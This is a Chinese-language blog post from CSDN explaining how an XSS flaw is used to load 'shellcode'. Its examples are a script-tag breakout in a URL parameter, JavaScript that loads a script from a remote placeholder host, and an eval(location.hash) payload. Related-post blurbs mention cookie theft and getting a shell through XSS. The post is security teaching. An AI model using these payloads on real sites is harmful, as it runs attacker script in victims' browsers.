XSS----shellcode的调用

:::::::::

已于 2024-06-11 18:21:22 修改

阅读量811

点赞数

分类专栏： Web安全 #XSS 文章标签： xss 前端

于 2019-09-24 02:17:47 首次发布

本文链接：https://blog.csdn.net/qq_39338006/article/details/101239510

版权

Web安全同时被 2 个专栏收录

2 篇文章 0 订阅

订阅专栏

#XSS

2 篇文章 0 订阅

订阅专栏

shellcode、exploit、poc

shellcode:最初是指溢出程序和蠕虫病毒核心，实际上是指利用漏洞所执行的一段代码
Exploit：英文意思利用，编写好的漏洞利用工具或程序，具有攻击性
Poc:Proof of Concept缩写，是一段证明漏洞存在的程序代码

动态调用远程JavaScript（缺点是URL中容易显露出来）
格式：

https://www.xxxxx.com/index.php?sort=[exploit]

可直接把shellcode写到URL中，如：

https://www.xxxx.com/view.php?sort="><script>alert(/xss/)</script>
#或者赋值变量动态创建，假设机子的脚本位xss.js 如：
var s=document.createElement("script")
s.src="http://wwww.xxxx.com/xss.js";
document.getElementByTagName("head")[0].apendChild(s);

#当然这里亦可以使用jQuery来写是一样，而且会更简洁

使用window.location.hash(这种方式不需要加载服务器上的脚本) ，示例：

http://www.xxxx.com/view.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

:::::::::

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

xss-labs-master.rar

05-09

"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台，旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡，由浅入深，逐步引导用户掌握XSS攻防的核心技巧。一、XSS...

【XSS漏洞04】XSS漏洞对shellcode的调用方法

Fighting_hawk的博客

02-24

3098

1. shellcode可以存储在远程文件、URL、HTTP头、其他网页中； 2. 通过多种方式利用XSS漏铜触发shellcode执行； 3. 利用XSS下载器与http头信息的方法还需要加强。

1 条评论您还未登录，请先登录后发表或查看评论

【XSS漏洞-06】XSS漏洞利用案例（浏览器劫持、会话劫持、GetShell）—基于神器beEF

m0_64378913的博客

06-02

4472

（1）了解beEF工具的使用；（2）加深理解XSS漏洞的利用和危害；（3）掌握浏览器劫持的攻击方法；（4）掌握会话劫持的攻击方法；（5）掌握通过XSS漏洞GetShell的方法。

XSS-跨站脚本攻击

最新发布

qq_64177395的博客

08-16

1718

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型，这种类型的脚本是最常见的，也是使用最为广泛的一种，主要用于将恶意的脚本附加到URL地址的参数中。

【XSS漏洞-04】如何调用XSS漏洞的shellcode

m0_64378913的博客

05-15

1693

目录1 实验简介1.1 实验目的1.2 实验环境2 shellcode的调用实验2.1 远程调用JS2.2 利用Windows.location.hash触发JS2.3 利用XSS下载器2.4 备选存储技术在上两节中我们了解了XSS漏洞验证、语句构造与绕过的方法，而完整的XSS攻击会将shellcode（shellcode就是利用漏洞所执行的代码）存放在一个地方，然后在存在XSS漏洞的地方触发漏洞去调用代码。 1 实验简介 1.1 实验目的模拟利用XSS漏洞执行shellcode的几种方法。 1.2 实

记一次XSS至getshell全过程！

hot_milk1的博客

02-27

1494

偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包，可在content参数插入xss语句这是访客前台效果：这是后台管理的效果：而且只要客服查看信息，便可以执行XSS语句然并卵，本来想钓客服的cookie，登录后台，找到shell点，成功getshell（幻想时间），但是经过测试，发现该客服系统的session是受保护的，并不能窃取到cookie已经决定放弃这个点了，随后在审计源码后，发现了图片上传点老样子，抓包改后缀解码得知，不支持php的文件格式。

XSS也能getshell

u014213713的专栏

05-15

5701

我的想法是这样的有很多CMS都有修改模板或者修改文件的功能我们可以自己构造一个外部的URL去post提交修改模板或其他文件从而实现XSSgetshell ！同样这方法能做很多事情比如增加管理员账号什么的前提条件要管理员登陆状态下若CMS系统有XSS漏洞那就更完美了呵呵我这里随便找了一套带文件增删改的cms测试呵呵（这CMS也有XSS不过因为魔术原因利用起来不太利索，这

xss-labs.zip

03-18

这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台，包含了20个具有不同XSS特征的网页示例。通过这个实验室，你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型：...

xss-labs-master源码

07-06

"xss-labs-master"是一个专门设计的靶场，包含了20个级别的XSS练习，旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战，我们可以逐步提升对XSS攻击的理解，并提升安全...

xss-lab全通关教程

05-07

在XSS-lab的20个关卡中，你将依次接触这些类型，并学习如何构造有效的XSS payload，以及如何利用各种过滤和转义机制来绕过防护。例如，你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...

渗透学习-靶场篇-XSS之订单与shell箱子反杀

qq_43696276的博客

09-19

2692

这里，我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外，我们还将进行shell箱子的反杀过程！！

xss跨站，订单，shell箱子反杀记

san3144393495的博客

05-24

947

弹窗1，这是刚刚写的跨站代码语句执行成功了，如果我们写一些可以盗取对方cookie的代码，获取到cookie之后再利用这个cookie去尝试登陆这个后台，可以得到后台的信息，同样后台里面如果说能够进行这个权限提升，我们说的文件上传，尝试文件上传操作拿到网站的webshell，这都是可以进行的后缀操作。这个是可以进行xss漏洞的测试，凡是有这种数据交互的地方，前端有一个数据的接受，后端是数据的显示，这个过程就符合漏洞产生的前提条件，将输入的数据进行个显示，不太推荐那个语句的原因，太明显了，重新访问一下。

跨站平台XSS SHELL使用方法

weixin_33968104的博客

03-24

347

理解xss shell是什么之前，让我们一起回顾一下一些基本的xss（跨站脚本），xss是最常见的一个漏洞，存在于今天许多的web应用程序。xss是***者试图通过web应用程序执行恶意脚本的技术，***者通过突破同源策略的web应用程序。***者一旦能够找到一个存在xss漏洞的web应用程序，他可以利用这个漏洞只想不同类型的***其中一些是：窃取凭据（Stealing C...

XSS跨站订单和shell反杀

qq_50613938的博客

11-03

295

Webshell箱子：相信很多人都使用过asp或者php的大马，一般这些大马的代码都是加密过的，这就存在一些猫腻了，因为在这些加密过的代码中有着后门代码，这些后门会将你找到的shell发送到他的服务器，就相当于你给别人打工。废话不多说,实战来演示一下webshell箱子： 1、首先我们搭建一下asp服务器来放置webshell箱子(后门) 2、然后进入我们的后门网页，默认账号密码都是admin 3、随意构造一个一句话木马，然后再一句话木马代码里插入javascript语句来制作后门(调用webshel

discuz xss拿shell

Coisini的博客

05-26

1484

Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...

XSS漏洞利用的构造方法，变形方式，Shellcode的调用

weixin_47306547的博客

09-28

2024

XSS的四种构造方法 1.利用 <> 构造HTML/JS 可以利用 <> 构造 HTML 标签和 <script> 标签在测试页面提交参数 <h1 style='color:red'>利用 <> 构造 HTML/JS </h1> 提交 <script> alert(/xss/) </script> 2.伪协议可以使用 jacasc...

XSS-窃取Cookie及拓展

2301_76631050的博客

07-23

852

步骤一：来到xss平台点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二：用记事本打开1.js 修改js中的这⼀⾏代码，改成我们伪造的flash⽹站⽹址。步骤七：点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋：配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件！步骤二：在我的项目中选择我们刚创建的项目，点击右上角的查看配置代码。把文件复制到我们网站的根目录下。

XSS（跨站脚本攻击）详解

jkzyx123的博客

07-12

9821

XSS是一种常见的安全漏洞，它允许攻击者在受害者浏览器上执行恶意脚本。攻击者通过在网页中注入恶意代码，使得用户浏览该页面时，恶意代码会被执行。

xss-labs安装

07-28

XSS-labs是一个用于学习和测试跨站脚本攻击（XSS）的平台。根据引用\[1\]，在学习了XSS的基础知识并完成了一些简单的XSS测试后，可以开始攻略XSS-labs。不过需要注意的是，对于XSS-labs，我们只需大致了解一些思路...

XSS----shellcode的调用

shellcode、exploit、poc

shellcode:最初是指溢出程序和蠕虫病毒核心，实际上是指利用漏洞所执行的一段代码

Exploit：英文意思利用，编写好的漏洞利用工具或程序，具有攻击性

Poc:Proof of Concept缩写，是一段证明漏洞存在的程序代码

动态调用远程JavaScript（缺点是URL中容易显露出来）

格式：

可直接把shellcode写到URL中，如：

使用window.location.hash(这种方式不需要加载服务器上的脚本) ，示例：